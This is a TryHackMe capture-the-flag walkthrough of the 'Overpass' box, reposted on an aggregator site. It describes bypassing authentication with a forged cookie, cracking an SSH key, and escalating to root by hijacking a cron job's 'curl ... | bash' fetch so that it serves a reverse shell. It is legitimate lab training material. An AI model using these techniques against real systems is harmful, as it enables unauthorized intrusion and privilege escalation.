TryHackMe Overpass 1 – CompSci Students Creating a PW Manager (Gone Bad) : Benjamin Reitz

TryHackMe Overpass 1 – CompSci Students Creating a PW Manager (Gone Bad)
by: Benjamin Reitz
blow post content copied from  Finxter
click here to view original post


Rate this post

PREMISE

The premise of the box is that a group of computer science students has created a password encryption/decryption tool.

👉 "What happens when a group of broke Computer Science students try to make a password manager? Obviously a perfect commercial success!" 

We are tasked with hacking our way into their server as the root user.

This capture-the-flag challenge on TryHackMe involves cookie creation and file spoofing in order to escalate privileges to the root user. It is rated as an easy box. If you don’t like spoilers, I’d recommend trying this free hacking challenge first before reading any further.

This box is the first in a three-part series. In part two, we will be doing some basic forensics after a cyber attack hits the overpass server.

And in part three we will prove to the Overpass developers that they need to make some security upgrades to their server hosting.

First, let’s record our IPs and get them ready to export as Linux variables.

export targetIP=10.10.179.249
export myIP=10.6.2.23

ENUMERATION

A simple nmap scan shows the following results:

┌─[kalisurfer@parrot]─[~/THM/overpass-walkthrough]
└──╼ $sudo nmap $targetIP
[sudo] password for kalisurfer:
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-21 06:01 EST
Nmap scan report for 10.10.179.249
Host is up (0.087s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 8.44 seconds
---

Nothing is surprising here. These are the standard ports for HTTP web applications and ssh services. 

Next, we’ll run a dirb scan to do some directory sniffing. Our dirb scan results reveal a few interesting HTML directories. We’ll take a closer look into each of these leads.

/admin
/aboutus
/css
/downloads

We find the plaintext sourcecode in the /downloads folder!

This will almost certainly be worth looking at closely for more information about the encryption mechanism. Posting the sourcecode is the first of several horrible decisions the Overpass dev team has made with their password storage program.

Some of the takeaways from examining the source code are:

  1. The encryption method used is a caesar cypher with a rotation of 47. There is a link in the sourcecode pointing to: https://socketloop.com/tutorials/golang-rotate-47-caesar-cipher-by-47-characters-example
  2. Encrypted passwords are saved locally in a hidden file .passlist in the root directory. This will probably be are method for retrieving the root password after we gain an initial foothold into the system.
  3. This encryption (ROT47) is invertible, which means to decrypt a password all we have to do is run the ROT47 cipher code a second time.

There is also an executable file for each operating system of the password storage tool. Download and running the program overpassLinux shows that we can retrieve passwords as long as there is a .overpass hidden file in the /root directory.

INITIAL FOOTHOLD VIA COOKIE CREATION

We find a login portal at $targetIP/admin.

First, we inspect the login with burpsuite and carefully examine the response to an unsuccessful username:password, noticing that the user is rerouted to /admin after an unsuccessful login attempt.

Instead of wasting time attempting to bruteforce our way in with a wordlist, we use firefox in developer mode and discover that there are no stored cookies. If we create a new cookie with the name SessionToken, and a reroute path of “/” we find a hidden encrypted ssh key. Voila!

Since you keep forgetting your password, James, I've set up SSH keys for you.

If you forget the password for this, crack it yourself. I'm tired of fixing stuff for you.
Also, we really need to talk about this "Military Grade" encryption. - Paradox

-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337

LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiN
JHnLS8oUVR6Smosw4pqLGcP3AwKvrzDWtw2ycO7mNdNszwLp3uto7ENdTIbzvJal
73/eUN9kYF0ua9rZC6mwoI2iG6sdlNL4ZqsYY7rrvDxeCZJkgzQGzkB9wKgw1ljT
WDyy8qncljugOIf8QrHoo30Gv+dAMfipTSR43FGBZ/Hha4jDykUXP0PvuFyTbVdv
BMXmr3xuKkB6I6k/jLjqWcLrhPWS0qRJ718G/u8cqYX3oJmM0Oo3jgoXYXxewGSZ
AL5bLQFhZJNGoZ+N5nHOll1OBl1tmsUIRwYK7wT/9kvUiL3rhkBURhVIbj2qiHxR
3KwmS4Dm4AOtoPTIAmVyaKmCWopf6le1+wzZ/UprNCAgeGTlZKX/joruW7ZJuAUf
ABbRLLwFVPMgahrBp6vRfNECSxztbFmXPoVwvWRQ98Z+p8MiOoReb7Jfusy6GvZk
VfW2gpmkAr8yDQynUukoWexPeDHWiSlg1kRJKrQP7GCupvW/r/Yc1RmNTfzT5eeR
OkUOTMqmd3Lj07yELyavlBHrz5FJvzPM3rimRwEsl8GH111D4L5rAKVcusdFcg8P
9BQukWbzVZHbaQtAGVGy0FKJv1WhA+pjTLqwU+c15WF7ENb3Dm5qdUoSSlPzRjze
eaPG5O4U9Fq0ZaYPkMlyJCzRVp43De4KKkyO5FQ+xSxce3FW0b63+8REgYirOGcZ
4TBApY+uz34JXe8jElhrKV9xw/7zG2LokKMnljG2YFIApr99nZFVZs1XOFCCkcM8
GFheoT4yFwrXhU1fjQjW/cR0kbhOv7RfV5x7L36x3ZuCfBdlWkt/h2M5nowjcbYn
exxOuOdqdazTjrXOyRNyOtYF9WPLhLRHapBAkXzvNSOERB3TJca8ydbKsyasdCGy
AIPX52bioBlDhg8DmPApR1C1zRYwT1LEFKt7KKAaogbw3G5raSzB54MQpX6WL+wk
6p7/wOX6WMo1MlkF95M3C7dxPFEspLHfpBxf2qys9MqBsd0rLkXoYR6gpbGbAW58
dPm51MekHD+WeP8oTYGI4PVCS/WF+U90Gty0UmgyI9qfxMVIu1BcmJhzh8gdtT0i
n0Lz5pKY+rLxdUaAA9KVwFsdiXnXjHEE1UwnDqqrvgBuvX6Nux+hfgXi9Bsy68qT
8HiUKTEsukcv/IYHK1s+Uw/H5AWtJsFmWQs3bw+Y4iw+YLZomXA4E7yxPXyfWm4K
4FMg3ng0e4/7HRYJSaXLQOKeNwcf/LW5dipO7DmBjVLsC8eyJ8ujeutP/GcA5l6z
ylqilOgj4+yiS813kNTjCJOwKRsXg2jKbnRa8b7dSRz7aDZVLpJnEy9bhn6a7WtS
49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2
+hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk
2cWk/Mln7+OhAApAvDBKVM7/LGR9/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7
-----END RSA PRIVATE KEY-----

It looks like our initial foothold will be as the user james. Let’s pause for a moment to collect our thoughts and plan out the next steps in our attack.

RETRIEVING THE PASSCODE FOR THE ENCRYPTED SSH FILE

This is our plan going forward to retrieve the passcode for the encrypted ssh file:

  1. Save the ssh key string as a new file (without the header and footer).
  2. Use ssh2john to prep the hash for john the ripper.
  3. Use john to crack that hash and find key our ssh keyfile passcode

SSHing INTO USER JAMES

With the following command, we can now log in as james with our trusty ssh passcode and ssh keyfile. The user.txt flag is right there in James’ home folder.

!!!
Thm{65c                                6bf7}
!!!

USING OVERPASSLINUX TO RETRIEVE THE USER PASSWORD

Now that we are in as user James, we can run the overpass program again on the encoded string (,LQ?2>                                       8A:4EFC6QN.)

We hit a small snag, seeing that user James doesn’t have proper permissions to run overpassLinux on target machine. Using SCP we can copy James’ .overpass file to our attack machine. Running overpassLinux on our machine, we can now recover James’ account password. 

I decided to use python3 to create a rot47 encryption/decryption script. A quick google search brought up the following script:

def rot47(s):
        x = []
        for i in range(len(s)):
        j = ord(s[i])
        if j >= 33 and j <= 126:
                x.append(chr(33 + ((j + 14) % 94)))
        else:
                x.append(s[i])
        return ''.join(x)

s=",LQ?2>                                       8A:4EFC6QN."
print(rot47(s))

Using nano to edit the script, I added a few tweaks to make it run smoothly on my machine and decrypt James’ password. 

[{"name":"System","pass":"                        "}]
!!!  (james password)

FURTHER ENUMERATION FOR POTENTIAL ATTACK VECTORS

First, I explored whether or not there are setuid bins that user james can run on the system with the following command:

james@overpass-prod:~$ find /bin -perm -4000

—
/bin/fusermount
/bin/umount
/bin/su
/bin/mount
/bin/ping
—

Looking each of these bins up on gtfobins showed that there aren’t any clear paths forward yet…

Checking the kernel on https://www.exploit-db.com/ showed a potential lead – a kernel exploit found on target machine! (https://www.exploit-db.com/exploits/47163 (CVE-2019-13272)).

However, after compiling the exploit and running it on the target machine, the exploit failed saying that this machine is not vulnerable. 

Linux 4.10 < 5.1.17 PTRACE_TRACEME local root (CVE-2019-13272)
[.] Checking environment ...
[!] Warning: Could not find active PolKit agent
[.] Searching for known helpers ...
[.] Searching for useful helpers ...
[.] Ignoring blacklisted helper: /usr/lib/update-notifier/package-system-locked

Running the attack with Metasploit using the PTRACE_TRACEME module also failed, confirming my hunch that this isn’t a viable attack vector. 

FINDING A VIABLE ATTACK VECTOR FOR PRIVILEGE ESCALATION

Next, we check the crontab on the target machine for any automated programs set to run regularly:

cat /etc/crontab

And bingo! We found a viable escalation path -!!! 

The following output shows that buildscript.sh is set to run as root every minute as a curl command from overpass.thm/downloads/src/.

 * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash

Here is our plan going forward to exploit this system misconfiguration:

  1. First, change the /etc/hosts file on our target machine to hijack the overpass.thm domain by rerouting it to our attack machine’s IP
  2. Use revshells.com to create a reverse shell payload to our netcat listener
  3. Create a spoof of buildscript.sh with the malicious payload and locate it at $myIP:/downloads/src/buildscript.sh
  4. Spin up a simple HTTP server on port 80 from our attack machine, serving up the spoofed file in the correct directory (/downloads/src/)
  5. Boot up a Netcat listener on the port we specified in the revshell payload.
  6. Wait for a maximum of 60 seconds to catch the reverse shell as root!
 Thm{7f33                            53bb}

December 25, 2022 at 08:18PM
Click here for more details...

=============================
The original post is available in Finxter by Benjamin Reitz
this post has been published as it is through automation. Automation script brings all the top bloggers post under a single umbrella.
The purpose of this blog, Follow the top Salesforce bloggers and collect all blogs in a single place through automation.
============================

Salesforce